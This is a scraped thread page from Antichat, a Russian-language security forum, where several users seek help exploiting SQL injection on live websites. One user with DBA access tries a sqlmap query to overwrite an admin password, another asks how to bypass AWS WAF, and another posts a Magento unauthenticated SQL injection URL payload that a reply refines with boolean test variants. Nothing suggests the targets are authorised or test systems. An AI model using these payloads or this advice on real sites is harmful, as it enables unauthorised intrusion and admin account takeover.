HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1071  
Старый 23.09.2020, 01:39
karkajoi
Guest
Сообщений: n/a
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от Gutman999  
Gutman999 said:

Не совсем понял тебя друже. Ты имеешь ввиду php code injection? Я с этим не знаком
Ну да, это дает больше профита чем иньекция, но верить акуше я бы не стал
 
Ответить с цитированием

  #1072  
Старый 23.09.2020, 08:54
Gutman999
Guest
Сообщений: n/a
Провел на форуме:
3379

Репутация: 0
По умолчанию

Цитата:
Сообщение от karkajoi  
karkajoi said:

Ну да, это дает больше профита чем иньекция, но верить акуше я бы не стал
А как эту уязвимость реализовать не подскажешь? Мана нету случайно?
 
Ответить с цитированием

  #1073  
Старый 23.09.2020, 09:27
eminlayer7788
Guest
Сообщений: n/a
Провел на форуме:
36807

Репутация: 1
По умолчанию

Цитата:
Сообщение от Gutman999  
Gutman999 said:

А как эту уязвимость реализовать не подскажешь? Мана нету случайно?
https://github.com/sqlmapproject/sqlmap/wiki/Usage
 
Ответить с цитированием

  #1074  
Старый 01.10.2020, 01:20
sosidzh24
Guest
Сообщений: n/a
Провел на форуме:
5258

Репутация: 0
По умолчанию

--is-dba: True. Могу я изменить пароль админа? Какая команда должна быть? Есть несколько баз данных, текущая 'admin' в ней таблица 'users' и колонку пароль 'password'.

Я попробовал так --sql-query "UPDATE users SET password = '123' WHERE email = 'admin@admin.com';" Выбило ошибку "execution of non-query SQL statements is only available when stacked queries are supported". Как правильно сделать?
 
Ответить с цитированием

  #1075  
Старый 22.10.2020, 17:42
madam
Guest
Сообщений: n/a
Провел на форуме:
50513

Репутация: 1
По умолчанию

Цитата:
Сообщение от sosidzh24  
sosidzh24 said:

--is-dba: True. Могу я изменить пароль админа? Какая команда должна быть? Есть несколько баз данных, текущая 'admin' в ней таблица 'users' и колонку пароль 'password'.
Я попробовал так --sql-query "UPDATE users SET password = '123' WHERE email = '
admin@admin.com
';" Выбило ошибку "execution of non-query SQL statements is only available when stacked queries are supported". Как правильно сделать?
PHP не поддерживает стек запросов, когда СУБД является MySQL
 
Ответить с цитированием

  #1076  
Старый 26.10.2020, 15:42
brown
Guest
Сообщений: n/a
Провел на форуме:
43449

Репутация: 1
По умолчанию

как обойти WAF/IPS identified as 'AWS WAF (Amazon)'

Array

(

[0] => Array

(

[0] => 42000

[SQLSTATE] => 42000

[1] => 8114

Код:
Code:
=> 8114
            [2] => [Microsoft][ODBC Driver 17 for SQL Server][SQL Server]Error converting data type nvarchar to int.
            [message] => [Microsoft][ODBC Driver 17 for SQL Server][SQL Server]Error converting data type nvarchar to int.
        )

)
 
Ответить с цитированием

  #1077  
Старый 03.11.2020, 11:28
Gigggs
Guest
Сообщений: n/a
Провел на форуме:
3469

Репутация: 0
По умолчанию

Подскажите пожалуйста , Акунетикс нашел вот такую уязвимость Magento (2.2.0 to 2.3.0) Unauthenticated SQL Injection Vulnerability

нашел видос и пару статей как раскрутить

вот к примеру

но ничего не выходт

вот как выглядит

https:// site.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+3 *3>8)+--+-

или я что то не так делаю, может кто подскажет какие варианты еще есть или команды, или там вообще нет уязвимости
 
Ответить с цитированием

  #1078  
Старый 03.11.2020, 20:18
fandor9
Guest
Сообщений: n/a
Провел на форуме:
169390

Репутация: 47
По умолчанию

Цитата:
Сообщение от Gigggs  
Gigggs said:

Подскажите пожалуйста , Акунетикс нашел вот такую уязвимость Magento (2.2.0 to 2.3.0) Unauthenticated SQL Injection Vulnerability
нашел видос и пару статей как раскрутить
вот к примеру
но ничего не выходт
вот как выглядит
https:// site.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+3 *3
>8)+--+-
или я что то не так делаю, может кто подскажет какие варианты еще есть или команды, или там вообще нет уязвимости
Гадать на кофейной гуще?

Что вам говорит site/magento_version

Что получаете в ответ когда шлёте

Код:
Code:
)))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+1=1)+--+-
и что получаете

Код:
Code:
)))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+1=0)+--+-
Первоисточник
 
Ответить с цитированием

  #1079  
Старый 03.11.2020, 21:12
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Привет помогите!

Через SQLmap в PostgreSQL создал --sql-shell как мне сохранить output запросов?

SQLmap стандартным способом сохраняет но через --dump мне не выдает ничего только через sql-shell
 
Ответить с цитированием

  #1080  
Старый 10.11.2020, 12:27
Gigggs
Guest
Сообщений: n/a
Провел на форуме:
3469

Репутация: 0
По умолчанию

подскажите , че это такое?

available databases [7]:
[*] `\\xfc@\xdc\xff\xfbt\xb7?\xfd\xff\xff\xa0? "@>@?\xf1W\x8f\xa0#\xff\x90@\xf2?\xfe\xe8\xff\xc8\ xf9\xf9\xe4c\xfa;7:\xbc\x80\xeb\x83\xf`
[*] `\xfc\xff\xc8\xf3\xfc\xa0\xe3\xe4\xd0?\xff\xc8\xff \x84>1\xe2\x909\xfc

\xfe?\xca\xd8+\xf0V`
[*] `\xfc \xc8\xfcD\x81▒\xff\xe8\xff\xf8\xff \x85 \xc4\xff\x9f\xfa\xf3\xf1NH\xe3\xe2\xb9 \xa2\xe1

\x801\xfb\xa0`
[*] `\xfc \xff\xff\xfa\xbf\xc8?\x8f ? ?\xff\xfa$8\xff\xfb?\xff\xe4\xff\xff\xfe1 \xff\xfc\xe1G\xf9^\xe0\xffq\xc1`
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ